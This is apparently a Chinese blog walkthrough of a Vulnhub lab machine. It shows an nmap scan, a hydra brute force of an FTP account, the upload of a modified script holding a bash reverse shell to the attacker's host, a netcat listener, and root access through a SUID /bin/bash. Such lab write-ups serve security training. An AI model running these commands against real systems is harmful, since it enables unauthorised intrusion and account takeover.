文章目录
- 前言
- 1、靶机ip配置
- 2、渗透目标
- 3、渗透概括
- 开始实战
- 一、信息获取
- 二、爆破FTP服务
- 三、GetShell
- 四、提权
前言
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!
👉本文靶机下载连接-戳我直接下载!👈
1、靶机ip配置
- Kali IP:192.168.2.4
- 靶机IP:192.168.2.7
靶机ip获取方式如下图
2、渗透目标
- 获取到/root/目录下的flag文件
3、渗透概括
- ftp信息获取
- ftp服务爆破
- 通过ftp建立反弹shell
- /bin/bash的suid提权
开始实战
一、信息获取
使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP
如下所示
可以看到,开放的几个端口分别是21/ftp 22/ssh 80/http 3306/mysql
21/ftp
从扫描结果可以看到可以使用ftp的匿名用户anonymous
登录,并且有一个welcome.msg
的文件
22/ssh
ssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息或者爆破才使用这个
80/http
基本上大部分的漏洞都是存在于web服务上
3306/mysql
是Mysql服务,后续如果获取到了一些用户信息可以用来爆破或者写马之类的
我们先看看21/ftp
上的文件
我们通过如下方式下载welcome.msg
文件
看看文件内容,如下图
发现了一个有意思的东西,这个文件内的内容其实就是在登录ftp
时显示的消息,如下所示
发现了一个关键的信息,那就是有一个邮箱sky@funbox9
其中sky
可能是一个用户名
二、爆破FTP服务
我使用如下命令对ftp服务的sky
用户进行爆破
hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 32 192.168.2.7 ftp
如下所示,sky
用户的密码是thebest
我们使用获得的账户密码登录该靶机的ftp
服务
如下所示,登录成功之后该用户的目录下有一个user.flag
的文件,我们使用get
命令将其下载
我们看看下载好的user.flag
文件
如下所示,这段内容是sh
脚本文件,貌似会被执行,那么这里就有操作的空间了
三、GetShell
我们编辑下载下来的user.flag
文件,改为如下内容(反弹shell)
#!/bin/sh
/bin/bash -i >& /dev/tcp/192.168.2.4/1234 0>&1
我们再次登录ftp
服务,将编辑完之后的user.flag
文件上传
使用nc -lvvp 1234
监听一下反弹shell
然后再次登录ftp
随便输入个账户即可
如下所示,我们的nc
即可监听到反弹过来的shell
使用whoami
命令发现当前是sarah
用户
我们再使用python3 -c 'import pty;pty.spawn("/bin/bash")'
命令升级一下shell
四、提权
使用sudo -l
发现需要密码,我们并不知道密码,就先放弃
我们使用如下命令找找具有suid权限的命令
find / -perm -u=s -exec ls -al {} \; 2>/dev/null
结果如下所示/bin/bash
具有suid权限,那么我们就可以利用这个提权
如下所示,我们使用/bin/bash
即可成功提权到root
如下所示,我们切换到/root
目录
获取flag文件root.flag
即完成该靶机的渗透